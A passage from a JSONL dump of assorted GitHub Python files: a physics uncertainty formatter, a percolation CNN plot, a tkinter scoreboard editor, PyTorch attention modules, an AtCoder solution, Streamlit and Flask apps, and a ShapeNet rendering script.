abs(scaled_error_p))\n\n num2, unc2, exponent2 = get_uncertainty_tokens(y)\n\n # Choose the representation of the number with more digits\n # This is necessary for asymmetric intervals where one of the two errors is much larger in magnitude\n # than the others. For example, 1 -0.01 +90. This will choose 1.00 instead of 1, so that the final\n # representation will be 1.00 -0.01 +90\n\n if len(num1) > len(num2):\n\n num = num1\n\n else:\n\n num = num2\n\n # Get the exponent of 10 to use for the representation\n\n expon = int(np.log10(order_of_magnitude))\n\n if unc1 != unc2:\n\n # Asymmetric error\n\n repr1 = \"%s%s\" % (sign_m, unc1)\n repr2 = \"%s%s\" % (sign_p, unc2)\n\n if expon == 0:\n\n # No need to show any power of 10\n\n return \"%s %s %s\" % (num, repr1, repr2)\n\n elif expon == 1:\n\n # Display 10 instead of 10^1\n\n return \"(%s %s %s) x 10\" % (num, repr1, repr2)\n\n else:\n\n # Display 10^expon\n\n return \"(%s %s %s) x 10^%s\" % (num, repr1, repr2, expon)\n\n else:\n\n # Symmetric error\n repr1 = \"+/- %s\" % unc1\n\n if expon == 0:\n\n return \"%s %s\" % (num, repr1)\n\n elif expon == 1:\n\n return \"(%s %s) x 10\" % (num, repr1)\n\n else:\n\n return \"(%s %s) x 10^%s\" % (num, repr1, expon)\n\n\ndef _sign(number):\n\n if number < 0:\n\n return \"-\"\n\n else:\n\n return \"+\"\n","repo_name":"threeML/threeML","sub_path":"threeML/io/uncertainty_formatter.py","file_name":"uncertainty_formatter.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"2"} +{"seq_id":"19414421795","text":"\nimport os\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"]=\"3\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" # gpu if \"0\"; cpu if \"-1\"\nimport numpy as np\nimport tensorflow as tf\ngpus = tf.config.experimental.list_physical_devices('GPU')\ntf.config.experimental.set_virtual_device_configuration(gpus[0],\n [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=4608),\n tf.config.experimental.VirtualDeviceConfiguration(memory_limit=4608)])\ntf.keras.backend.clear_session()\nimport time\nimport random\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import PCA, IncrementalPCA, KernelPCA\nfrom sklearn.manifold import TSNE\nfrom sklearn.cluster import KMeans\n\nfrom utils import read_data\n\nstart_time = time.time()\nseed = 12345\nrandom.seed(seed)\nnp.random.seed(seed=seed)\n\nsweeps = 10**3\nimage_height = 28\nimage_size = 28*28\nepochs = 10**3\nlearning_rate = 1e-4\nbatch_size = 256\nl2_rate = 1e-4\n\nnum_classes = 1\nl2_rate = 0\nfilter1 = 32\nfilter2 = 64\nfc1 = 128\ndropout_rate = 0.5\n\nper = np.linspace(0.41, 0.80, 40).reshape(-1,) # 0.593\nfile_location = os.getcwd()\nx = read_data(file_location=file_location + r\"\\data\", \n name=\"x_1000\")\npi1 = pi = read_data(file_location=file_location+r\"\\data\", name=\"Pi_1000\")\np1 = p = read_data(file_location=file_location+r\"\\data\", name=\"P_1000\")\n\npi_m = np.array(np.tile(pi, sweeps))\na = np.argwhere((pi_m<=0.1) & (pi_m>=0.9))\nb = np.argwhere((pi_m>0.1) & (pi_m<0.9))\n\n# pi = pi[a].reshape(-1, 1)\n# p = p[a].reshape(-1, 1)\npi = np.append(pi[np.argwhere(pi<=0.1)], pi[np.argwhere(pi>=0.9)],axis=0)\np = np.append(p[np.argwhere(pi<=0.1)], p[np.argwhere(pi>=0.9)],axis=0)\n# per = np.concatenate((per[np.argwhere(pi<=0.1)], per[np.argwhere(pi>=0.9)]),axis=0)\nper = list(np.arange(0.41, 0.54, 0.01)) + list(np.arange(0.65, 0.80, 0.01))\nper_test = list(np.arange(0.55, 0.65, 0.01))\n\n# x1 = 
x[a].reshape(-1, image_height, image_height, 1)\nx_test = x[b].reshape(-1, image_height, image_height, 1)\n\nmodel_pi = tf.keras.models.load_model(file_location +\n r\"\\model_cnn_pi\" +\n r\"\\inference\" +\n r\"\\00956-0.000071-0.005427-0.008450-0.000504-0.009347-0.022452.h5\")\nmodel_p = tf.keras.models.load_model(file_location +\n r\"\\model_cnn_p\" +\n r\"\\inference\" +\n r\"\\00814-0.000030-0.003213-0.005510-0.000164-0.006277-0.012796.h5\")\n\n\nfig = plt.figure(figsize=(5,4)) \nax = fig.add_subplot(111) \nplt.plot(np.linspace(0.41, 0.80, 40), pi1, c='grey', \n marker=\"*\", label=\"MC\", linewidth=2)\nplt.scatter(per, pi, c='dodgerblue', marker=\"s\", \n label=\"truncated\", linewidth=2)\ny_pred = model_pi.predict(x_test)\ny_pred_average = [y_pred[i::10] for i in np.arange(10)]\ny_pred_average = np.array(y_pred_average).reshape(-1, 1000)\ny_pred_average = np.mean(y_pred_average, axis=1)\nplt.scatter(per_test, y_pred_average, c='indianred', \n label=\"extrapolated\", marker=\"o\", linewidth=2)\n# ax.text(0.41, 0.93, '(a)', fontsize=14)\nplt.xlabel('$p$', fontsize=14)\nplt.ylabel('$\\Pi(p,L)$', fontsize=14)\nplt.xticks(size=12)\nplt.yticks(size=12)\nplt.xlim(0.39, 0.81)\nplt.ylim(-0.09, 1.09)\nplt.legend(loc=\"lower right\")\nax = plt.gca()\nax.spines['bottom'].set_linewidth(1.5)\nax.spines['left'].set_linewidth(1.5)\nax.spines['top'].set_linewidth(1.5)\nax.spines['right'].set_linewidth(1.5)\nfrom pylab import *\ntick_params(which='major', width=2)\nax.xaxis.set_major_locator(plt.MultipleLocator(0.1))\nax.yaxis.set_major_locator(plt.MultipleLocator(0.2))\nax.xaxis.set_minor_locator(plt.MultipleLocator(0.01))\nplt.subplots_adjust(left=None,bottom=None,\n right=None,top=None,wspace=0.5,hspace=None)\nplt.tight_layout()\n\n# ax = fig.add_subplot(122) \n# plt.plot(np.linspace(0.41, 0.80, 40), p1, c='grey', marker=\"*\", label=\"raw\", linewidth=2)\n# # plt.scatter(per, p, c='dodgerblue', marker=\"s\", label=\" truncated dataset\", linewidth=2)\n# y_pred = model_p.predict(x_test)\n# y_pred_average = [y_pred[i::10] for i in np.arange(10)]\n# y_pred_average = np.array(y_pred_average).reshape(-1, 1000)\n# y_pred_average = np.mean(y_pred_average, axis=1)\n# plt.scatter(per_test, y_pred_average, c='indianred', \n# label=\" removed dataset\", marker=\"o\", linewidth=2)\n# ax.text(0.41, 0.93, '(a)', fontsize=14)\n# plt.xlabel('permeability', fontsize=14)\n# plt.ylabel('$P(p,L)$', fontsize=14)\n# plt.xticks(size=12)\n# plt.yticks(size=12)\n# plt.xlim(0.39, 0.81)\n# plt.ylim(-0.09, 1.09)\n# plt.grid(True, linestyle='--', linewidth=1.5)\n# plt.legend(loc=\"lower right\")\n# ax = plt.gca()\n# ax.spines['bottom'].set_linewidth(1.5)\n# ax.spines['left'].set_linewidth(1.5)\n# ax.spines['top'].set_linewidth(1.5)\n# ax.spines['right'].set_linewidth(1.5)\n\nplt.savefig(r\".\\figure\\cnn-percolation-pi-inference.pdf\")\nplt.savefig(r\".\\figure\\cnn-percolation-pi-inference.eps\")\nplt.show()\n","repo_name":"Chen-Sue/Percolation_Model_ML","sub_path":"plot-cnn-percolation-pi-p-inference.py","file_name":"plot-cnn-percolation-pi-p-inference.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36100195894","text":"from tkinter import *\nimport tkinter\nimport io\nimport xml.etree.cElementTree as ET\nimport datetime\n\ntop = tkinter.Tk() # class in tkinter that is being saved as variable\n\ntop.resizable(width=\"False\", height=\"False\")\n\ndef extractCharNames():\n file = open(\"characters.txt\", \"r\")\n 
characternames = (file.read()).split(\"\\n\")\n characternames.sort()\n return characternames\n\n\ndef getTime():\n currenttime = datetime.datetime\n time = currenttime.now()\n print(time)\n return str(time)\n\n\ndef outputXML():\n name1 = Entry.get(p1Name)\n char1 = p1.get()\n num1 = score1.get()\n name2 = Entry.get(p2Name)\n char2 = p2.get()\n num2 = score2.get()\n team1 = color1.get()\n name3 = Entry.get(p3Name)\n char3 = p3.get()\n name4 = Entry.get(p4Name)\n char4 = p4.get()\n team2 = color2.get()\n tw1 = Entry.get(twitter1Name)\n tw2 = Entry.get(twitter2Name)\n loc = Entry.get(location)\n dt = Entry.get(date)\n comm1 = Entry.get(comm1Name)\n comm2 = Entry.get(comm2Name)\n bLink = Entry.get(bracketLink)\n brackLoc = Entry.get(bracketLocation)\n\n root = ET.Element(\"scoreboard\")\n players = ET.SubElement(root, \"players\")\n # elements below players\n ET.SubElement(players, \"player1\").text = name1\n ET.SubElement(players, \"character1\").text = char1\n ET.SubElement(players, \"score1\").text = num1\n ET.SubElement(players, \"player2\").text = name2\n ET.SubElement(players, \"score2\").text = num2\n ET.SubElement(players, \"character2\").text = char2\n ET.SubElement(players, \"team-color1\").text = team1\n ET.SubElement(players, \"player3\").text = name3\n ET.SubElement(players, \"character3\").text = char3\n ET.SubElement(players, \"player4\").text = name4\n ET.SubElement(players, \"character4\").text = char4\n ET.SubElement(players, \"team-color2\").text = team2\n\n # elements below game status\n status = ET.SubElement(root, \"game-status\")\n ET.SubElement(status, \"bracket-location\").text = brackLoc\n ET.SubElement(status, \"bracket-link\").text = bLink\n ET.SubElement(status, \"date\").text = dt\n ET.SubElement(status, \"location\").text = loc\n\n # elements for commentary\n comm = ET.SubElement(root, \"commentary\")\n ET.SubElement(comm, \"commentator1\").text = comm1\n ET.SubElement(comm, \"commentator2\").text = comm2\n ET.SubElement(comm, \"twitter1\").text = tw1\n ET.SubElement(comm, \"twitter2\").text = tw2\n\n ET.SubElement(root, \"timestamp\").text = getTime()\n\n tree = ET.ElementTree(root)\n tree.write(\"../overlay/scoreboard.xml\")\n\n\ndef swap():\n name1 = Entry.get(p1Name)\n name2 = Entry.get(p2Name)\n name3 = Entry.get(p3Name)\n name4 = Entry.get(p4Name)\n char1 = p1.get()\n char2 = p2.get()\n char3 = p3.get()\n char4 = p4.get()\n p1Name.delete(0, END)\n p1Name.insert(0, name2)\n p2Name.delete(0, END)\n p2Name.insert(0, name1)\n p3Name.delete(0, END)\n p3Name.insert(0, name4)\n p4Name.delete(0, END)\n p4Name.insert(0, name3)\n p1.set(char2)\n p2.set(char1)\n p3.set(char4)\n p4.set(char3)\n\n\nlistOfChars = extractCharNames()\n\n\ntop.title(\"Stream Editor\")\ncolor1 = StringVar(top)\ncolor2 = StringVar(top)\np1 = StringVar(top)\np2 = StringVar(top)\np3 = StringVar(top)\np4 = StringVar(top)\nscore1 = StringVar(top)\nscore2 = StringVar(top)\nteamColors = {\"blue\", \"red\", \"green\"}\nscores = [\"0\", \"1\", \"2\", \"3\"]\n\nplayers = Label(top, text=\"Players\").grid(row=0,column=0)\nteam1Text = Label(top, text=\"Team 1\").grid(row=1, column=0)\np1Title = Label(top, text=\"Player 1\").grid(row=1, column=1)\np1Name = Entry(top, bd=5)\np1Name.grid(row=1, column=2)\np1Char = OptionMenu(top, p1, *listOfChars).grid(row=1, column=3)\np1Score = OptionMenu(top, score1, *scores).grid(row=1, column=4)\nteam2Text = Label(top, text=\"Team 2\").grid(row=1, column=5)\np2Title = Label(top, text=\"Player 2\").grid(row=1, column=6)\np2Name = Entry(top, bd=5)\np2Name.grid(row=1, 
column=7)\np2Char = OptionMenu(top, p2, *listOfChars).grid(row=1, column=8)\np2Score = OptionMenu(top, score2, *scores).grid(row=1, column=9)\n# team color picker\nt1Color = OptionMenu(top, color1, *teamColors)\nt1Color.grid(row=2, column=0)\np3Title = Label(top, text=\"Player 3\").grid(row=2, column=1)\np3Name = Entry(top, bd=5)\np3Name.grid(row=2, column=2)\np3Char = OptionMenu(top, p3, *listOfChars).grid(row=2, column=3)\nt2Color = OptionMenu(top, color2, *teamColors).grid(row=2, column=4)\np4Title = Label(top, text=\"Player 4\").grid(row=2, column=5)\np4Name = Entry(top, bd=5)\np4Name.grid(row=2, column=6)\np4Char = OptionMenu(top, p4, *listOfChars).grid(row=2, column=7)\n# game status\ngameStatus = Label(top, text=\"Game Status\").grid(row=3, column=0)\nbracketLocText = Label(top, text=\"Bracket Location\").grid(row=4, column=0)\nbracketLocation = Entry(top, bd=5)\nbracketLocation.grid(row=4, column=1)\nbracketLinkText = Label(top, text=\"Bracket Link\").grid(row=4, column=2)\nbracketLink = Entry(top, bd=5)\nbracketLink.grid(row=4, column=3)\ndateText = Label(top, text=\"Date\").grid(row=4, column=4)\ndate = Entry(top, bd=5)\ndate.grid(row=4, column=5)\nlocationText = Label(top, text=\"Location\").grid(row=4, column=6)\nlocation = Entry(top, bd=5)\nlocation.grid(row=4, column=7)\n# commentary\ncommentaryText = Label(top, text=\"Commentary\").grid(row=5, column=0)\ncomm1Text = Label(top, text=\"Commentator 1\").grid(row=6, column=0)\ncomm1Name = Entry(top, bd=5)\ncomm1Name.grid(row=6, column=1)\ncomm2Text = Label(top, text=\"Commentator 2\").grid(row=6, column=2)\ncomm2Name = Entry(top, bd=5)\ncomm2Name.grid(row=6, column=3)\ntwitter1Text = Label(top, text=\"Twitter1\").grid(row=7, column=0)\ntwitter1Name = Entry(top, bd=5)\ntwitter1Name.grid(row=7, column=1)\ntwitter2Text = Label(top, text=\"Twitter 2\").grid(row=7, column=2)\ntwitter2Name = Entry(top, bd=5)\ntwitter2Name.grid(row=7, column=3)\n\n# swap command that changes player 1 and 2 names and characters\nswap = Button(top, text=\"Swap\", command=swap).grid(row=7, column=6)\n# saves the text in the boxes to an XML file\nsave = Button(top, text=\"Save!\", command=outputXML).grid(row=7, column=7)\n\ntop.mainloop()\n","repo_name":"joncady/scoreboard_and_overlays","sub_path":"scoreboard/scoreboard_editor.py","file_name":"scoreboard_editor.py","file_ext":"py","file_size_in_byte":6002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"24291154901","text":"import torch\nimport torch.nn as nn\nfrom einops import rearrange\n# class CC(nn.Module):\n# \"\"\"Constructs a C_C module.\n# Args:\n# channel: Number of channels of the input feature map\n# \"\"\"\n# def __init__(self, kernel):\n# super(CC, self).__init__()\n# self.avg_pool = nn.AdaptiveAvgPool2d(1)\n# self.conv = nn.Conv1d(1, 1, kernel_size=kernel, padding=int((kernel-1)//2), bias=False)\n# self.sigmoid = nn.Sigmoid()\n#\n# def forward(self, x):\n#\n# # feature descriptor on the global spatial information\n# y = self.avg_pool(x)\n# # Two different branches of CC module\n# t=rearrange(rearrange(y,'b c w h->b c (w h)'),'b c w->b w c')\n# y = self.conv(t)\n# y=rearrange(rearrange(y,'b c w->b w c'),'b c (w h)->b c w h',w=1,h=1)\n# # Multi-scale information fusion\n# y = self.sigmoid(y)\n#\n# return x * y.expand_as(x)\nclass CC(nn.Module):\n def __init__(self, channel,k_size):\n super(CC, self).__init__()\n self.k_size=k_size\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.conv = nn.Conv1d(channel, channel, kernel_size=k_size, 
bias=False, groups=channel)\n self.sigmoid = nn.Sigmoid()\n\n\n def forward(self, x):\n b, c, _, _ = x.size()\n y = self.avg_pool(x)\n y = nn.functional.unfold(y.transpose(-1, -3), kernel_size=(1, self.k_size), padding=(0, (self.k_size - 1) // 2))\n y = self.conv(y.transpose(-1, -2)).unsqueeze(-1)\n y = self.sigmoid(y)\n x = x * y.expand_as(x)\n return x\nclass BasicConv(nn.Module):\n def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, dilation=1, groups=1, relu=True, bn=True, bias=False):\n super(BasicConv, self).__init__()\n self.out_channels = out_planes\n self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=bias)\n self.bn = nn.BatchNorm2d(out_planes,eps=1e-5, momentum=0.01, affine=True) if bn else None\n self.relu = nn.ReLU() if relu else None\n\n def forward(self, x):\n x = self.conv(x)\n if self.bn is not None:\n x = self.bn(x)\n if self.relu is not None:\n x = self.relu(x)\n return x\nclass ZPool(nn.Module):\n def forward(self, x):\n return torch.cat( (torch.max(x,1)[0].unsqueeze(1), torch.mean(x,1).unsqueeze(1)), dim=1 )\n\nclass AttentionGate(nn.Module):\n def __init__(self):\n super(AttentionGate, self).__init__()\n kernel_size = 3\n self.compress = ZPool()\n self.conv = BasicConv(2, 1, kernel_size, stride=1, padding=(kernel_size-1) // 2, relu=False)\n def forward(self, x):\n x_compress = self.compress(x)\n x_out = self.conv(x_compress)\n scale = torch.sigmoid_(x_out)\n return x * scale\nclass TripletAttention(nn.Module):\n def __init__(self, no_spatial=False):\n super(TripletAttention, self).__init__()\n self.cw = AttentionGate()\n self.hc = AttentionGate()\n self.no_spatial=no_spatial\n if not no_spatial:\n self.hw = AttentionGate()\n def forward(self, x):\n x_perm1 = x.permute(0,2,1,3).contiguous()\n x_out1 = self.cw(x_perm1)\n x_out11 = x_out1.permute(0,2,1,3).contiguous()\n x_perm2 = x.permute(0,3,2,1).contiguous()\n x_out2 = self.hc(x_perm2)\n x_out21 = x_out2.permute(0,3,2,1).contiguous()\n if not self.no_spatial:\n x_out = self.hw(x)\n x_out = 1/3 * (x_out + x_out11 + x_out21)\n else:\n x_out = 1/2 * (x_out11 + x_out21)\n return x_out\nclass CCWH(nn.Module):\n def __init__(self, channels):\n super(CCWH, self).__init__()\n self.C_H = AttentionGate()\n self.C_W = AttentionGate()\n self.C_C=CC(channels,3)\n def forward(self, x):\n x_perm1 = x.permute(0, 2, 1, 3).contiguous()\n x_out1 = self.C_W(x_perm1)\n x_out11 = x_out1.permute(0, 2, 1, 3).contiguous()\n x_perm2 = x.permute(0, 3, 2, 1).contiguous()\n x_out2 = self.C_H(x_perm2)\n x_out21 = x_out2.permute(0, 3, 2, 1).contiguous()\n\n x_out = self.C_C(x)\n #print(x_out11.shape,x_out.shape)\n x_out = (1/2)*(x_out11 + x_out21)+x_out\n return x_out\n# model = CCWH(160)\n# import time\n# input = torch.randn(4, 160, 32,32)\n# start=time.time()\n# out = model(input)\n# print(time.time()-start)\n# print(out.shape)","repo_name":"Willamjie/CCWH-ACB","sub_path":"models/CCWH_0.py","file_name":"CCWH_0.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"4775436420","text":"import io\nimport sys\n_INPUT = \"\"\"\\\n6\n1 5 7 10 15 19\n6\n0\n2\n6\n12\n18\n25\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n#--------------------------------------#\n\nN = int(input())\nA = list(map(int, input().split())) + [-10**18] + [10**18]\nA.sort()\nQ = int(input())\n\ndef bisearch(rate):\n l, r = 0, N+1\n while l+1 < r:\n mid = (l + r) // 2\n if 
rate == A[mid]:\n return mid\n elif rate < A[mid]:\n r = mid\n else:\n l = mid\n return l\n\nfor _ in range(Q):\n Bi = int(input())\n class_left = bisearch(Bi)\n print(min(Bi - A[class_left], A[class_left+1] - Bi))\n\n\n","repo_name":"yudaiOfRiver/atcoder","sub_path":"tenkei/007.py","file_name":"007.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"1742509657","text":"import streamlit as st\nimport pandas as pd\n\ndef main():\n \"\"\"\n This function shows the raw dataset behind the dashboard\n :return: Table with data\n \"\"\"\n # set title\n st.title(\"Data\")\n st.write(\"Data retrieved from: https://www.kaggle.com/code/lennarthaupts/airbnb-prices-in-berlin/data\")\n # dataframe\n data = pd.read_csv(\"listings_berlin.csv\")\n\n # give the user the opportunity to have a look at the data\n if st.checkbox(\"Show data...\"):\n st.subheader(\"Raw data\")\n # show data\n st.write(data)\n st.subheader(\"Locations of Airbnb's\")\n st.map(data)","repo_name":"MilenaLang/streamlit_dashboard","sub_path":"app/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74533844205","text":"from time import sleep\nfrom enum import IntEnum\n\n# Importing from local source\nfrom communication.subscriber import Subscriber\nfrom communication.server import Server\n\n\n \n\n# Subscribers\nIP = 'localhost'\nTRACKING_PORT = 5556\nDEPTH_PORT = 5558\nSERIAL_PORT = 5560\n\n# Server\nHOST = '0.0.0.0'\nPORT = 8089\n\n# Tracking camera\ntracking_camera_sub = Subscriber(ip=IP, port=TRACKING_PORT, topic='pose')\ntracking_camera_sub.initialize()\n\n# Depth camera\ndepth_camera_sub = Subscriber(ip=IP, port=DEPTH_PORT, topic='img')\ndepth_camera_sub.initialize()\n\n# Serial connection\n#serial_sub = Subscriber(ip=IP, port=SERIAL_PORT, topic='serial')\n#serial_sub.initialize()\n\n# Internal server\nserver = Server(host=HOST, port=PORT)\nserver.initialize()\n\n\nif __name__ == \"__main__\":\n while True:\n if not server.isConnected():\n server.listening()\n while server.isConnected():\n try:\n tracking_camera_sub.read()\n #server.send(tracking_camera_sub.msg)\n #serial_sub.read()\n #server.send(serial_sub.msg)\n depth_camera_sub.read()\n server.send(\"HELLO\")\n except Exception:\n server.disconnect()\n ","repo_name":"magnusoy/Sparkie","sub_path":"python/src/deprecated/gui_server.py","file_name":"gui_server.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"2"} +{"seq_id":"14350235775","text":"from app.core import init_app, connect_db\nimport logging\nimport sys\n\napp = init_app()\nif __name__ == '__main__':\n try:\n app.run(debug=app.config['DEBUG'], host=app.config['HOST'], port=int(app.config['PORT']))\n except Exception:\n logging.error(\"Cannot start Flask app: {} {}\".format(\n sys._getframe().f_code.co_name,\n str(sys.exc_info())\n ))\n","repo_name":"chuonglh/todo","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25167990171","text":"# 1. Simple divisors of N\nN = int(input())\nN_list = []\nfor i in range(1,N+1):\n if N % i == 0:\n N_list.append(i)\nprint(N_list)\n\n# 2. 
Summing a list\ndef list_sum(num):\n result = 0\n for i in num:\n result += i\n return result\nprint(list_sum([1,2,3,4,5]))\n\n# 3. Summing a list made of dictionaries\ndef dict_list_sum(x):\n ages = 0\n for i in range(len(x)):\n ages += x[i]['age']\n return ages\nage_list = [{'name' : 'kim', 'age' : 12}, {'name' : 'Lee', 'age' : 4}] \nprint(dict_list_sum(age_list))\n\n# 4. Summing all elements of a 2-D list\ndef all_list_sum(x):\n result = 0\n for i in range(len(x)):\n for j in range(len(x[i])):\n result += x[i][j]\n return result\n\nall_list = [[1], [2,3], [4,5,6], [7,8,9,10]]\nprint(all_list_sum(all_list))\n\n# 5. The meaning of the numbers\ndef get_secret_word(x):\n word = ' '\n for i in range(len(x)):\n word += chr(x[i])\n return word\nget_word = [83, 115, 65, 102, 89]\nprint(get_secret_word(get_word))\n\n# 6. What number is my name?\ndef get_secret_number(x):\n number = 0\n for i in x:\n number += ord(i)\n return number\nget_number = 'happy'\nprint(get_secret_number(get_number))\n\n# 7. The strong name\ndef get_strong_word(x,y):\n if get_secret_number(x) > get_secret_number(y):\n return x\n else:\n return y\nprint(get_strong_word('delilah','dixon'))\n\n\n","repo_name":"ShinJongHyuk/hws","sub_path":"01_python/04_advanced_function_and_env/04_python_practice.py","file_name":"04_python_practice.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"13171402368","text":"import os, sys\nnowpath = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(nowpath)\nsys.path.append(os.path.join(nowpath, '..'))\nfrom data_choy import DataLoader_Choy\nfrom core.mystruct import Camera, View, FnameGroup, RenderParam\nfrom core.dataset.ShapeNetV2 import ShapeNetV2\nfrom core.randomize.randomizer import Randomizer\nfrom core.tools.render import Renderer\nimport numpy as np\nfrom tqdm import tqdm\nimport pdb\n\nclass ChoyRenderer(object):\n def __init__(self, shapenet_dir, choy_dir, output_dir, resolution=(137, 137)):\n self.data_shapenet = ShapeNetV2(shapenet_dir)\n self.data_choy = DataLoader_Choy(choy_dir)\n self.output_dir = output_dir\n if not os.path.exists(self.output_dir):\n os.makedirs(self.output_dir)\n randomizer_config_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', 'core', 'randomize', 'choy_renderer.yaml')\n self.randomizer = Randomizer(config_file=randomizer_config_file)\n self.resolution = resolution\n\n self.transform_matrix_deepsdf = np.array([[1., 0., 0.], [0., 0., -1.], [0., 1., 0.]])\n self.transform_matrix_choy = np.array([[0., 0., -1.], [0., 1., 0.], [1., 0., 0.]])\n self.transform_matrix = np.dot(self.transform_matrix_choy, self.transform_matrix_deepsdf.T)\n\n def transform_camera(self, camera):\n K, RT = camera.intrinsic, camera.extrinsic\n R, T = RT[:,:3], RT[:,[3]]\n R_new = np.dot(R, self.transform_matrix)\n RT_new = np.concatenate([R_new, T], 1)\n camera_new = Camera(K, RT_new)\n return camera_new\n\n def generate_render_param_list(self):\n render_param_list = []\n for i, data in enumerate(self.data_choy):\n basedir = data['basedir']\n class_id = data['class_id']\n instance_name = data['instance_name']\n camera_list = data['camera_list']\n view_list = data['view_list']\n render_param = self.generate_render_param_from_camera(basedir, class_id, instance_name, camera_list)\n # render_param = self.generate_render_param_from_view(basedir, class_id, instance_name, camera_list)\n render_param_list.append(render_param)\n return render_param_list\n\n def generate_render_param_from_camera(self, basedir, class_id, 
instance_name, camera_list):\n shape = self.data_shapenet.get_shape_from_instance_name(class_id, instance_name)\n view_list, lighting_list, target_cfg_list = [], [], []\n for idx, camera in enumerate(camera_list):\n # set view\n view = View()\n camera = self.transform_camera(camera)\n view.set_camera(camera)\n # set lighting\n lighting = self.randomizer.randomize_lighting(use_point_lighting=False)\n # set target filename\n # basedir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'test')\n basedir = os.path.join(self.output_dir, class_id, instance_name)\n if not os.path.exists(basedir):\n os.makedirs(basedir)\n target_cfg = FnameGroup(os.path.join(basedir, '{0}_{1}_{2}.png'.format(class_id, instance_name, idx)))\n # append to list\n view_list.append(view)\n lighting_list.append(lighting)\n target_cfg_list.append(target_cfg)\n render_param = RenderParam(shape, view_list, lighting_list, target_cfg_list, resolution=self.resolution) \n return render_param\n\n def generate_render_param_from_view(self, basedir, class_id, instance_name, view_list):\n shape = self.data_shapenet.get_shape_from_instance_name(class_id, instance_name)\n view_list, lighting_list, target_cfg_list = [], [], []\n for idx, view in enumerate(view_list):\n lighting = self.randomizer.randomize_lighting()\n basedir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'test')\n target_cfg = FnameGroup(os.path.join(basedir, '{0}_{1}_{2}.png'.format(class_id, instance_name, idx)))\n view_list.append(view)\n lighting_list.append(lighting)\n target_cfg_list.append(target_cfg)\n render_param = RenderParam(shape, view_list, lighting_list, target_cfg_list, resolution=self.resolution) \n return render_param\n\nif __name__ == '__main__':\n nowpath = os.path.dirname(os.path.abspath(__file__))\n shapenet_dir = os.path.join(nowpath, '../data/ShapeNetCore.v2')\n choy_dir = os.path.expanduser('~/data/ShapeNetRendering')\n blender_dir = os.path.join(nowpath, '../install/blender-2.71-linux-glibc211-x86_64/blender')\n output_dir = os.path.expanduser('~/data/ambient-choy-ShapeNetV2')\n\n choy_renderer = ChoyRenderer(shapenet_dir, choy_dir, output_dir)\n render_param_list = choy_renderer.generate_render_param_list()\n RP = Renderer(blender_dir, num_worker=8)\n RP.render_all(render_param_list, cam_lens=35, render_depth=True, render_normal=False, render_albedo=False)\n\n","repo_name":"B1ueber2y/DIST-Renderer","sub_path":"synthesis/preprocess_choy/render_choy.py","file_name":"render_choy.py","file_ext":"py","file_size_in_byte":4979,"program_lang":"python","lang":"en","doc_type":"code","stars":212,"dataset":"github-code","pt":"2"} +{"seq_id":"22106371875","text":"'''\n处理输入数据\n'''\n\nimport base64\n\ndef handle_input(data: dict):\n '''\n 处理输入数据,把base64编码的数据解码,并把一切驼峰式命名转化为下划线命名\n '''\n\n if 'data' in data:\n data['data'] = base64.b64decode(data['data'])\n\n out_data = {}\n for key in data:\n if '_' in key:\n continue\n new_key = ''\n for char in key:\n if char.isupper():\n new_key += '_' + char.lower()\n else:\n new_key += char\n out_data[new_key] = data[key]\n\n return out_data\n","repo_name":"Chlamydomonos/IOTHW1","sub_path":"backend/pySrc/utils/input_handler.py","file_name":"input_handler.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74645311085","text":"#Code adapated from https://github.com/andrewbeattycourseware/dataRepresenation2020\nfrom stockDAO import stockDao\nfrom flask import Flask, url_for, request, redirect, 
abort,jsonify\napp = Flask(__name__, static_url_path='', static_folder='staticpages')\n\n\n\n\n@app.route('/')\ndef index():\n return \"is this thing on?\"\n\n@app.route('/stock')\ndef getAll():\n return jsonify(stockDao.getAll())\n#curl http://127.0.0.1:5000/stock\n\n@app.route('/stock/') \ndef findById(id): \n return jsonify(stockDao.findById(id))\n#curl http://127.0.0.1:5000/stock/10\n\n\n#curl -X POST -d \"{\\\"description\\\":\\\"Apple Juice Box\\\", \\\"price\\\":1250, \\\"provenance\\\":\\\"The Apple Farm, Cahir\\\"}\" -H \"Content-Type:application/json\" http://127.0.0.1:5000/stock\n@app.route('/stock', methods=['POST'])\ndef create(): \n\n if not request.json: #abort the request if it is not in the correct json format\n abort(400)\n \n #if it is a good request do this, append the book with a new id and so on\n item = {\n #\"id\":request.json[\"id\"], omitted because the mysqldb is auto-incremented\n \"description\": 